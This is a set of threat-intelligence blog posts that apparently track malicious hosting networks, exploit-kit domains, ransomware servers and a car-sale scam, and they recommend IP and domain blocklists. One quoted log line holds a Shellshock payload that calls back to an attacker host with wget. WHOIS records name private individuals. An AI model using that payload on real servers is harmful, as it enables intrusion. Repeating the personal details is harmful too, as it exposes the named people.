Exploit kits on Choopa LLC / Gameservers.com IP addresses

While chasing down this exploit kit yesterday, I noticed an awful lot of related IP addresses and domains that also seemed to be hosting malware.

The characterstics of these malicious landing pages is that they use free domains (currently .co.vu) and seem to have a very short lifespan. As I write this, the following malicious domains are LIVE

ooshuchahxe.co.vu
ahjoneeshae.co.vu
phamiephim.co.vu
kaemahchuum.co.vu
pahsiefoono.co.vu
kaghaingai.co.vu
buengaiyei.co.vu
ohmiajusoo.co.vu
oodeerahshe.co.vu
paotuchepha.co.vu
aedeequeekou.co.vu
eikoosiexa.co.vu
phielaingi.co.vu
thohbeekee.co.vu

A typical exploit landing page looks like this [URLquery report] which appears to be the Nuclear EK.

These are hosted on the following Choopa LLC / Gamservers.com IP addresses (it is the same company with two different trading names) [clicking the IP leads to the VirusTotal results, ones identified as malicious are highlighted]:

108.61.165.69
108.61.165.70

108.61.165.96
108.61.167.160
108.61.172.139
108.61.175.125
108.61.177.107
108.61.177.89

All these malicious domains use the following nameservers:


ns1.thallsbe.com
ns1.yotelepa.com
ns1.zenteep.com
ns1.neverflouwks.com
ns1.daxpyorgilgere.com
ns1.irkoblik.com
ns2.thallsbe.com
ns2.yotelepa.com
ns2.zenteep.com
ns2.neverflouwks.com
ns2.daxpyorgilgere.com
ns2.irkoblik.com

Nameservers are mostly (but not all hosted on Choopa LLC IPs):

64.187.225.245
104.224.147.220
108.61.123.219
108.61.172.145
108.61.198.148
108.61.211.121

As I said, these domains see to have a very short life. I identified nearly 3000 domains using these nameservers, the following of which are flagged as malicious by Google (long list, sorry, scroll past it if you like):

offearfactory.cf
ukforsavectory.cf
ukforshivaflow.cf
soundchecker.cf
tobiahsebastiani.cf
crazystuff.ga
atproserafic.ga
soundchecker.ga
terriblelow.ml
stumbleupons.ml
ukforprimeebook.cf
greendriver.ga
ukforsavectory.ga
yellowcheck.ml
misterybook.cf
sporterafic.cf
thorteutsch.cf
imainconfig.ga
materofteck.ga
sporterafic.ga
pleskinebook.ga
lowensineflow.ga
warriordriver.ga
materofteck.ml
sporterafic.ml
lowensineflow.ml
mipkohoophw.cf
mipkoewushohn.cf
mipkoeerrw.ml
mipkohiocoh.ml
qdujbffg.cf
floraperf.cf
floreamva.cf
sintroota.cf
akcyvwkudu.cf
jepeugcpaq.cf
kzjzbbezgt.cf
rittfpynit.cf
unitedbeer.cf
vuktrontas.cf
wchiekohya.cf
wingasheng.cf
nikelnstate.cf
quitambient.cf
xotadddance.cf
xoteaddrack.cf
bloxianoiaba.cf
boyconroewom.cf
myfreenomapi.cf
walltaddates.cf
walltaddonce.cf
walltaddrave.cf
xoteaddotion.cf
trohqueenexai.cf
trotesaiheohu.cf
truechiekitha.cf
trueitheipoag.cf
vukontasixtas.cf
vuvatyisedron.cf
wallddforbake.cf
walltadddabit.cf
walltadddance.cf
walltadddsims.cf
wallteaddrack.cf
oproquanterbot.cf
veterloshamerr.cf
vuflowdeadcrow.cf
wallaerkinderr.cf
wallteaddotion.cf
wicomertulatti.cf
walltadddoppler.cf
amixionifyredhedi.cf
shamidgewoodpiste.cf
shoeufflorthrudis.cf
shoppaycleagoncad.cf
sosanasisernitive.cf
sourustieronixtur.cf
sparetediapletecu.cf
stekoneyredecklan.cf
subspironimitells.cf
sultintemicrearti.cf
coolmember.ga
krogralind.ga
rzanygngis.ga
unitedbeer.ga
wchiekohya.ga
weisewieku.ga
xotaddates.ga
xotaddrave.ga
junoreactor.ga
quitambient.ga
xoteaddrack.ga
dealerstrike.ga
trudahsheeso.ga
vumalworrest.ga
walltaddates.ga
walltaddonce.ga
walltaddrave.ga
wamipkoleoxw.ga
xoteaddotion.ga
proquantterms.ga
tritaeneiquoh.ga
trohqueenexai.ga
trotesaiheohu.ga
troyeachahgie.ga
truechiekitha.ga
truexauphudei.ga
victorysecret.ga
vuxeersktrace.ga
wallddforbake.ga
walltadddabit.ga
walltadddance.ga
walltadddsims.ga
wallteaddrack.ga
xotadddoppler.ga
veterloshamerr.ga
victoaddroplen.ga
vuflowdeadcrow.ga
vuvtrassktrace.ga
wallaerkinderr.ga
wallteaddotion.ga
wheallstechaxa.ga
wolscelipartin.ga
wolvestreyrmst.ga
walltadddoppler.ga
serckinvenaftovan.ga
shamidgewoodpiste.ga
shoppaycleagoncad.ga
sosanasisernitive.ga
sourustieronixtur.ga
sparetediapletecu.ga
stekoneyredecklan.ga
subspironimitells.ga
sultintemicrearti.ga
facilygda.ml
iqmhaslyzd.ml
kriendbasi.ml
queezerbot.ml
rittfpynit.ml
xotaddrave.ml
contermance.ml
crazyworlds.ml
junoreactor.ml
loborrowave.ml
quitambient.ml
vuxtronrace.ml
xoteaddrack.ml
bloxianoiaba.ml
trudahsheeso.ml
vumalworrest.ml
vumullefloor.ml
walltaddates.ml
walltaddonce.ml
walltaddrave.ml
xoteaddotion.ml
lodborrowpler.ml
proquantterms.ml
triceebicicha.ml
triilequadaev.ml
tritaeneiquoh.ml
troshiechooph.ml
trotesaiheohu.ml
victorysecret.ml
vuxeersktrace.ml
wallddforbake.ml
walltadddabit.ml
walltadddance.ml
walltadddsims.ml
wallteaddrack.ml
wamipkoicjnew.ml
oproquantables.ml
veterloshamerr.ml
victoaddroplen.ml
wallteaddotion.ml
wickleyoregene.ml
wolscelipartin.ml
walltadddoppler.ml
serckinvenaftovan.ml
shamidgewoodpiste.ml
shoeufflorthrudis.ml
shoppaycleagoncad.ml
sosanasisernitive.ml
sourustieronixtur.ml
sparetediapletecu.ml
stekoneyredecklan.ml
subspironimitells.ml
sultintemicrearti.ml
sintroota.tk
sionixire.tk
bugleryambur.tk
zarauphudei.cf
zaraachwahgie.cf
zaragietheeghe.cf
zarabixampw.ga
zaradhoophw.ga
zarasicjnew.ga
zarauphudei.ga
zaraachwahgie.ga
zaraeqwuadaev.ga
zaraheeteghoh.ga
zaraohgeegheis.ga
zaratiihuw.ml
zarabixampw.ml
zarasicjnew.ml
zarasorsarw.ml
zaraulleoxw.ml
zaraachwahgie.ml
zaraeqwuadaev.ml
zaraewneiquoh.ml
uzaraeserexwai.ml
zaragietheeghe.ml
zaraweethiocoh.ml

In addition, these domains are tagged as malicious by SURBL:
xoteaddrack.cf
wallddforbake.cf
xoteaddrack.ga
walltadddsims.ga
walltaddates.ml
walltadddabit.ml
wallteaddrack.ml
siewaxiesha.co.vu
fourkopoll.co.vu
kurramithompartherd.co.vu

These are the TLDs and SLDs being abused, operated by Freenom (cf, ga, gq, ml, tk) or CoDotVu (co.vu). It looks like perhaps Freenom cleaned up their space, but you can make your own mind up if you want to block traffic to these as a precaution:
co.vu
cf
ga
gq
ml
tk


A full list of all the domains that I can find associated with these servers can be found here [pastebin].

Recommended minimum blocklist (Choopa LLC IPs are highlighted):
108.61.123.219
108.61.165.69
108.61.165.70
108.61.165.96
108.61.167.160
108.61.172.139
108.61.172.145
108.61.175.125
108.61.177.107
108.61.177.89
108.61.198.148
108.61.211.121

64.187.225.245
104.224.147.220

UPDATE:
Choopa LLC say they have terminated those IPs. However, it may still be worth reviewing your logs for traffic to these servers as they might identify machines that have been compromised.


Wednesday 31 December 2014

Evil network: 217.71.50.0/24 / ELTAKABEL-AS / TXTV d.o.o. Tuzla / aadeno@inet.ba

This post by Brian Krebs drew my attention to a block of Bosnian IP addresses with an unusually bad reputation. The first clue is given by Google's safe browsing diagnostics..

Safe Browsing
Diagnostic page for AS198252 (ELTAKABEL-AS)

What happened when Google visited sites hosted on this network?

    Of the 165 site(s) we tested on this network over the past 90 days, 6 site(s), including, for example, office-hosts.org/, invoice-ups.org/, refforwarding.eu/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2014-12-31, and the last time suspicious content was found was on 2014-12-26.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 10 site(s) on this network, including, for example, iprecognition.eu/, invoice-ups.net/, datavail.eu/, that appeared to function as intermediaries for the infection of 525 other site(s) including, for example, webtretho.com/, detik.com/, zaodich.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 15 site(s), including, for example, iprecognition.eu/, invoice-ups.net/, datavail.eu/, that infected 572 other site(s), including, for example, webtretho.com/, detik.com/, zaodich.com/.
Some of those domains rang a bell to do with recent malware attacks. One odd thing that struck me was that this is a sparsely populated but relatively large collection of IP addresses that appear to be mostly allocated to broadband customers rather than web hosts.

An investigation into what was lurking in this AS highlighted a problem block of 217.71.50.0/24 which contains very many bad sites, the WHOIS details for that block being..

inetnum:        217.71.48.0 - 217.71.63.255
descr:          TXTV d.o.o. Tuzla
org:            ORG-TdT1-RIPE
netname:        BA-TXTV-20030807
country:        BA
admin-c:        IK879-RIPE
tech-c:         IK879-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      MNT-NSC1
mnt-routes:     MNT-NSC1
notify:         ripe@txtv.ba
changed:        hostmaster@ripe.net 20030807
changed:        hostmaster@ripe.net 20040625
changed:        hostmaster@ripe.net 20050719
changed:        bitbucket@ripe.net 20081003
changed:        hostmaster@ripe.net 20110804
changed:        hostmaster@ripe.net 20140324
changed:        bit-bucket@ripe.net 20140325
source:         RIPE

organisation:   ORG-TdT1-RIPE
org-name:       TXTV d.o.o. Tuzla
org-type:       LIR
address:        TXTV d.o.o.
address:        Admir Jaganjac
address:        Focanska 1N
address:        75000
address:        Tuzla
address:        BOSNIA AND HERZEGOVINA
phone:          +38735353333
fax-no:         +38735266114
tech-c:         TXTV1-RIPE
abuse-mailbox:  abuse@txtv.ba
mnt-ref:        MNT-TXTV
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
admin-c:        AJ2947-RIPE
admin-c:        AA26986-RIPE
admin-c:        IK879-RIPE
abuse-c:        NSC11-RIPE
source:         RIPE
e-mail:         ripe@txtv.ba
changed:        bitbucket@ripe.net 20140324

person:         Igor Krneta
address:        Majora Drage Bajalovica 18
address:        78000 Banjaluka, BA
e-mail:         ripe@elta-kabel.com
phone:          +387 51 961 001
nic-hdl:        IK879-RIPE
mnt-by:         MNT-NAVIGOSC
changed:        ikrneta@navigosc.net 20071126
source:         RIPE

route:          217.71.50.0/24
descr:          Inet subnet #1
origin:         AS31630
mnt-by:         GENELEC-MNT
changed:        aadeno@inet.ba 20061029
source:         RIPE


I highlighted the part of most interest, which appears to be a block suballocated to someone using the email address aadeno@inet.ba.

I took a look at the sites hosted in this /24 and these are the results [csv]. There are 37 malicious websites (identified by Google) out of 185 that I found in this network range. The usual level of badness tends to be around 1%, but here it is 20%. Looking at the domains, it appears that there is nothing at all of value here and you can probably count them all as malicious.

Recommended blocklist:
217.71.50.0/24
darotkskeu.com
hijuvchr.com
humhfsara.com
lomospaoerotr.com
noerdfjkieswp.com
p28aa.com
pkoefkosaep.com
teeirkfoews.com
niggercar.es
invoice-ups.net
www-myups.net
invoice-myups.org
invoice-ups.org
office-hosts.org
softupdates.org
updatedns.org
www-myups.org
abdilo.ru
bihilafes.ru
cloudughtold.su
dedicnqher.su
dnspqajr.su
dnsxjkd.su
hosrvnwj.su
hostfjwmr.su
hostsple.su
hostyksn.su
servergotold.su
serverhersse.su
servermexyr.su
serveruey.su
serverxpqk.su
serviolt.su
ugulddedic.su
usehostru.su
uttofhost.su
vpsjsner.su
vpslopwz.su
baycityads.biz
blingstarscpm.biz
plustimber.biz
plutoads.biz
tempomedia.biz
dsffdsk323721372131.com
ny-discount-sales.com
rxmega-shop.com
rx-product-shop.com
safe-refill-rx.com
viphealhtmarket.com
datadirects.eu
dataremark.eu
dataresultsid.eu
datasynchronize.eu
datavail.eu
datsunplus.eu
dedistarid.eu
detectionstream1.eu
dmpcheck.eu
drellmedia.eu
elitemembers.eu
eplymedia.eu
eravideoads.eu
euserviceid.eu
forwardingref.eu
glowcheck.eu
iprecognition.eu
newsettingso.eu
ordealsting.eu
planacheck.eu
pluginverifys.eu
proudeuro.eu
refforwarding.eu
resellerapis.eu
rpmstatus.eu
samjectstar.eu
secondtierdirect.eu
selldataset.eu
soundads.eu
spokenads.eu
stretchstrong.eu
syncdata1.eu
trackingstreamchk.eu
trackstats.eu
trafficlax.eu
verablade.eu
club-rx-bestseller.ru
fuckaustralia.ru
rx-bestseller.ru




Tuesday 9 December 2014

Something evil on 5.196.33.8/29

This Tweet from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.

Specifically, VirusTotal lists badness on the following IPs:

5.196.33.8
5.196.33.9
5.196.33.10

There are also some doubtful looking IP addresses on 5.196.33.15 which may we have a malicious purpose.

All of these subdomains and domains [pastebin] are hosted in this block and I would suggest that you treat them as malicious.

Recommended blocklist:
5.196.33.8/29
jipwoyrnopwa.biz
kospoytrw.biz
belligerentladybug.com
hoplofrazoore.com
joptraeazalok.com
kiogosphwuysvx12.com
nelipraderson3.com
aderradpow.in
akojdurczopat.in
amoptrafnoger.in
apo83ggacer.in
apowiurbera.in
asdlpoqnoosgteer.in
asdpqwoieu12.in
asdqpwcya2.in
ashcytiqwer.in
askio2iytqrefa.in
asnodp3booztrea.in
azlaowumoa.in
blomcreaters.in
bvioplorazeno.in
bvopqcawea.in
bxpqy7everas.in
bzoapitradetn.in
cnertazootreas.in
coiqpyteramed.in
foksatboks3.in
golhahorsea.in
greolkopanx9.in
hiapwjertas.in
hokayreenols.in
jonofogolor.in
kiaowqptrea.in
koapnoxopaiuw72.in
kutradopretano98.in
lapouiqwg28.in
loatu27amop.in
looperfter4.in
mozgyterfaopetr.in
mxopa3ieravuk.in
nioapowedrakt.in
nitreamoptec.in
nloopboobs.in
npcowytrar.in
nxaopautrmoge.in
opqertasopma.in
poltraderano.in
sapertzalofasmo.in
vjogersamxe.in
vokjotreasmo.in
xboapvogtase.in
xnaiojipotram.in
xnaioqowhera.in
ywusbopa63a.in
zbtywraser.in
gpjfwsznuhdjgzwg.com
zntddwqtteq4.com

Incidentally, the .IN domains are not anonymised, but I would assume that the contact details are fake:
Registrant ID:WIQ_27860746
Registrant Name:Gennadiy Borisov
Registrant Organization:N/A
Registrant Street1:ul. Lyulyak 5
Registrant Street2:
Registrant Street3:
Registrant City:Varna
Registrant State/Province:
Registrant Postal Code:9000
Registrant Country:BG
Registrant Phone:+359.52601705
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:yingw90@yahoo.com


Thursday 4 December 2014

Something evil on 46.161.30.0/24 (KolosokIvan-net / Ivan Kolosok)

The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware.

In the past, this IP range has hosted various sites which have moved off. At the moment it seems to host just the following domains:

worldstocktrends.net
trackmepls.ru
casinoroyal7.ru
worldnews247.ru
clubstore29.ru
yourwebsupport.ru
countryregion.ru
chooseyourhost.ru

Active IPs are as follows:

46.161.30.16
46.161.30.18
46.161.30.20
46.161.30.20
46.161.30.24
46.161.30.41
46.161.30.42
46.161.30.43

Out of those domains, these following ones are linked with some sort of file locker malware:

casinoroyal7.ru [report]
clubstore29.ru [report]
yourwebsupport.ru [report]
chooseyourhost.ru [report]

The other domains have virtually no reference to them at all, which is somewhat suspicious.

The block as allocated as follows:

inetnum:        46.161.30.0 - 46.161.30.255
netname:        KolosokIvan-net
descr:          Net for customer ID 12510
country:        RU
admin-c:        KI811-RIPE
tech-c:         KI811-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-by:         MNT-PINSUPPORT
mnt-routes:     MNT-SELECTEL
changed:        admin@pinspb.ru 20130904
source:         RIPE

person:         Kolosok Ivan
address:        ul Lenina 19-56
phone:          +380766553642
e-mail:         kolosokivan@i.ua
nic-hdl:        KI811-RIPE
mnt-by:         KolosokIvan
changed:        kolosokivan@i.ua 20130830
source:         RIPE

route:          46.161.30.0/24
descr:          Selectel Customer
origin:         AS49505
mnt-by:         MNT-SELECTEL
changed:        korsakov@selectel.ru 20140901
source:         RIPE


There are no legitimate sites in this network range, so I strongly recommend that you block the entire 46.161.30.0/24 range.

Sunday 28 September 2014

Evil network: Shellshock and MangoHost (mangohost.net) / 83.166.234.0/24

I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday. I noticed that some cheeky b--stard was probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""
ad.dipaz.biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range, registered to:

inetnum:        83.166.234.0 - 83.166.234.255
netname:        MangoHost-Net
descr:          S.R.L. MangoHost Network
descr:          str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country:        MD
org:            ORG-SMN4-RIPE
admin-c:        VL6476-RIPE
tech-c:         VL6476-RIPE
status:         ASSIGNED PA
mnt-by:         RIM2000-MNT
notify:         noc@rim2000.ru
changed:        lukina@rim2000.ru 20140318
changed:        lukina@rim2000.ru 20140325
source:         RIPE

organisation:   ORG-SMN4-RIPE
org-name:       S.R.L. MangoHost Network
org-type:       OTHER
address:        str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail:         mangohostnetwork@gmail.com
abuse-c:        AR18923-RIPE
abuse-mailbox:  mangohostnetwork@gmail.com
mnt-ref:        CLOUDATAMD-MNT
mnt-by:         CLOUDATAMD-MNT
mnt-ref:        RIM2000-MNT
changed:        iuraqq@gmail.com 20140314
source:         RIPE

person:         Victor Letkovski
address:        T. Vladimirescu str 1/1 2024 Chisinau
phone:          +373 79 342393
nic-hdl:        VL6476-RIPE
mnt-by:         BSB-SERVICE-MNT
changed:        ripe@plusserver.de 20130520
source:         RIPE

% Information related to '83.166.234.0/24AS200019'

route:          83.166.234.0/24
descr:          S.R.L. MangoHost Network
origin:         AS200019
mnt-by:         RIM2000-MNT
changed:        lukina@rim2000.ru 20140319
source:         RIPE


MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau.

Until the past few days, MangoHost was hosting the ransomware sites listed here [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode.com, whatever that may be (you can guarantee it is nothing good).

Currently hosted domains include a collection of fake browser plugins, some malvertising sites, some porn, spam sites, hacker resources, ransomware domains and what might appear to be some fake Russian law firms. A list of everything that I can currently see in this /24 is:

for-your.biz
spr.for-your.biz
www.portw.org
1cpred.org
md1.vpn-service.us
jab.darkode.com
cappellina.com
ieplugins.net
ie-plugin.com
ie-addon.com
flanbase.org
porndays.org
allestic.org
shreqads.org
cpmjunction.org
indexcpm.org
friscoserve43.com
secsoncpm.com
clickcenter98.com
clickfunder81.com
adcountservices.com
ad.serverflamerstf.com
sfecpm.com
dialaclick.com
consultant-fond.ru
promo-consultin.ru
fond-consult.ru
rusinconsult.ru
yugconsalting.ru
partnersconsult.ru
buhsupport.biz
s2.futurevideo.su
s3.futurevideo.su
s4.futurevideo.su
tedaciokero.in
security-05znsa.pw
security-police5qnsa.pw
alert24world4xi.us
security-d07nsa.co.uk
security-g02nsa.co.uk
security-d07nsa.us
security-alert-nsacr.us
kubikrubik.me
ns1.kubikrubik.me
ns2.kubikrubik.me
ns2.kubikrubik.me
babulya.biz
ad.evhomebusiness.com
ad.emanuelecontractor.com
ad.theglamzsophisticate.com
ad.icanknittoo.info
smtp.gschultz.com
bounce.gschultz.com
smtp.agoodline.com
bounce.agoodline.com
smtp.ashlandmo.com
bounce.ashlandmo.com
smtp.circuitciy.com
bounce.circuitciy.com
ns2.hnnoceacecs.ru
ns2.jnojgnsecas.ru
ns2.jincoeacsc.ru
ns2.jnigunsecs.ru
zaconhelp.ru
pro-yurist.ru
yuristvsem.ru
zakon-vsem.ru
advocat4all.ru
pro-advocat.ru
yurist-info.ru
yuristzakon.ru
zakon-prost.ru
advocat-vsem.ru
advokat-prof.ru
jurist-otvet.ru
power-yurist.ru
pravomagistr.ru
zakon-yurist.ru
zakon-znatok.ru
zakonmagistr.ru
jurist-zabota.ru
yurist-vopros.ru
yurist-znatok.ru
advocat-jurist.ru
advocat-zakoni.ru
advokatura-pro.ru
pravoved-zakon.ru
pravovoiyurist.ru
yurist-protect.ru
yuristprozakon.ru
zakonhelponline.ru
pravoved-consult.ru
pravovoi-consultant.ru
analofday.com
www.analofday.com
ad.mobiplaystore.us
ad.glenlevit.us
ad.rioresults.us
ad.seojunctionaire.us
ad.directsign.us
ad.dipad.biz
ad.truestream.biz
ad.adrealmedia.biz
freelivepornwebcams.com

I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it.

Friday 29 August 2014

cars4cashuk.com scam and Cyber Cast International (CCIHosting), Panama [190.97.160.0/21]

I spotted this scam warning on the Autotrader website:
We have received reports of customers receiving a text message asking them to visit www.cars4cashuk.com to sell their cars quickly for cash. Customers are asked to pay a deposit in order to secure the sale of their vehicle. This website is not genuine and in no way affiliated with AutoTrader. We are currently working to have this website shut down.

For more information please contact our Customer Security team on 0330 303 9001.
The site is a crude attempt to extract money from unsuspecting people trying to trade their car, but it does feature the AutoTrader logo prominently.


If you're trying to sell your car then probably all you need to know is that it's a scam, and you probably don't need to read any further. But if you read my blog regularly then you might want to read on..

The site has no ownership information, but a check of the WHOIS details show the following contacts:

Domain Name: CARS4CASHUK.COM
Registry Domain ID:
Registrar WHOIS Server: whois.1api.net
Registrar URL: http://www.1api.net
Updated Date: 2014-08-10T15:31:12Z
Creation Date: 2014-08-10T15:31:12Z
Registrar Registration Expiration Date: 2015-08-10T15:31:12Z
Registrar: 1API GmbH
Registrar IANA ID: 1387
Registrar Abuse Contact Email: abuse@1api.net
Registrar Abuse Contact Phone: +49.68416984x200
Reseller: www.sky-ip.com http://www.sky-ip.com/
Domain Status: ok - http://www.icann.org/epp#OK
Registry Registrant ID:
Registrant Name: José Castrellón
Registrant Organization: CyberCast
Registrant Street: Ricardo J. Alfaro, El Dorado
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code: 0819-06448
Registrant Country: PA
Registrant Phone: +507.3014841
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: domains@sky-ip.com
Registry Admin ID:
Admin Name: José Castrellón
Admin Organization: CyberCast
Admin Street: Ricardo J. Alfaro, El Dorado
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code: 0819-06448
Admin Country: PA
Admin Phone: +507.3014841
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: domains@sky-ip.com
Registry Tech ID:
Tech Name: José Castrellón
Tech Organization: CyberCast
Tech Street: Ricardo J. Alfaro, El Dorado
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code: 0819-06448
Tech Country: PA
Tech Phone: +507.3014841
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: domains@sky-ip.com
Name Server: ns1.cybercastco.com
Name Server: ns2.cybercastco.com


So who are José Castrellón and CyberCast (aka CyberCast International). Are they the scammers? Well, no.. CyberCast (through their website at ccihosting.com) offer anonymous offshore hosting and domain registrations. The sort of things that scammers love, although of course there are legitimate uses for such things. CyberCast presumably are not doing the actual scamming, but I'd suggest that they could be accused of some level of complicity.


So.. you can buy a domain and web hosting using an anonymous payment system like Bitcoin or Perfect Money and it seems more-or-less do what you like with it. Now, that's great if you are running a web site dedicated to overthrowing an oppressive regime (for example) but the bulk of the sites hosted by CyberCast are a lot less savoury, including phishing sites, sites selling DDOS services, counterfeit goods, trading stolen credit card information, piracy sites, spam, cybersquatting, illegal or fake pharmacies, hacking sites and a little bit of porn as well.

There may well be some legitimate sites hosted by this company, I spotted some local Panamanian sites for example, but the overwhelming majority of the CyberCast / CCIHosting address space is completely toxic, therefore I would strongly recommend that you block access to the 190.97.160.0/21 range from your network.

There is not a lot of reputation data for the sites in this /21, but I have compiled a list of sites, IPs, WOT ratings and Google and SURBL prognoses here [csv].

Saturday 26 July 2014

"PLEASE SEND PI" spam / something evil on 198.27.110.192/26

"PI" in this case seems to refer to a Proforma Invoice rather than Π - but in fact the attachment is malware.

Date:      Fri, 25 Jul 2014 22:50:14 -0700 [01:50:14 EDT]
From:      OLINMETALS TRADING CO
Subject:      PLEASE SEND PI

Greetings,

Regarding our previous conversation about our urgent purchase, kindly
find attached PI and let us know if the quantity can fit in 40ft
container.
kindly revise the Proforma invoice so that we can proceed with an
advance payment as agreed.


We look forward to your urgent response with revised proforma invoice.


Thks & Rgds,
OLINMETALS TRADING CO., LTD
Tel : 0097143205171
Fax : 0097143377150 
It sounds like a fiendish maths question from an obscure exam. How much Π can you fit in a 40ft container? Anyway, the attachment Order.zip contains a malicious executable klopppp890.exe which has a VirusTotal detection rate of 18/53. The ThreatExpert report [pdf] and ThreatTrack report [pdf] show that the malware phones home to walex2.ddob.us/sddob/gate.php on 198.27.110.200 (OVH Canada reassigned to Big Kesh, LLC, US).

Looking at the domains registered on 198.27.110.200 and the surrounding IPs there do seem to be a lot of malicious ones being used as malware C&Cs:


frank.ddob.us 198.27.110.196
walex.ddob.us 198.27.110.196 [1]
dino.ddob.us 198.27.110.197 [2] [3]
mrson.ddob.us 198.27.110.200
walex2.ddob.us 198.27.110.200 [4]
robert.xiga.us 198.27.110.200 [5]
daniel.ddob.us 198.27.110.201 [6]
robert.ddob.us 198.27.110.201 [7]
326.xiga.us 198.27.110.203
frannky.ddob.us 198.27.110.210 [9]
janet.ddob.us 198.27.110.211
sayee.ddob.us 198.27.110.211 [10]
dino.ddob.us 198.27.110.213 [11] [12]
biolo.xiga.us 198.27.110.216

I think this is enough evidence to block the entire 198.27.110.192/26 as a precaution (although there do appear to be a small number of legitimate sites too). For the record, this is suballocated to:

NetRange:       198.27.110.192 - 198.27.110.255
CIDR:           198.27.110.192/26
OriginAS:       AS16276
NetName:        OVH-CUST-445017
NetHandle:      NET-198-27-110-192-1
Parent:         NET-198-27-64-0-1
NetType:        Reassigned
RegDate:        2014-03-07
Updated:        2014-03-07
Ref:            http://whois.arin.net/rest/net/NET-198-27-110-192-1

CustName:       Big Kesh, LLC
Address:        1077 Jearsey ln ne
City:           Palm Bay
StateProv:      FL
PostalCode:     32905
Country:        US
RegDate:        2014-03-07
Updated:        2014-03-07
Ref:            http://whois.arin.net/rest/customer/C04889220


In the case of Big Kesh LLC I will be charitable and assume that this behaviour is happening without their consent.

The domains xiga.us and ddob.us appear to be used for purely malicious purposes, so I recommend that you block them. The registrant details are probably fake but here they are:

xiga.us
Registrant ID:                               06BFAFB5641FA567
Registrant Name:                             Xieng Hyua
Registrant Address1:                         Red Bulevard
Registrant City:                             North Bergen
Registrant State/Province:                   NJ
Registrant Postal Code:                      07047
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.6874598745
Registrant Email:                            xiga@fbi.al
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11


ddob.us
Registrant ID:                               0121C76442E2ED55
Registrant Name:                             Jackson Togan
Registrant Address1:                         Zhongzeng District 100
Registrant City:                             Zhongzeng District
Registrant State/Province:                   Zhongzeng District
Registrant Postal Code:                      100
Registrant Country:                          TAIWAN, PROVINCE OF CHINA
Registrant Country Code:                     TW
Registrant Phone Number:                     +92.68974568
Registrant Email:                            jackson.togan@yahoo.com
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C11


Recommended blocklist:
198.27.110.192/26
xiga.us
ddob.us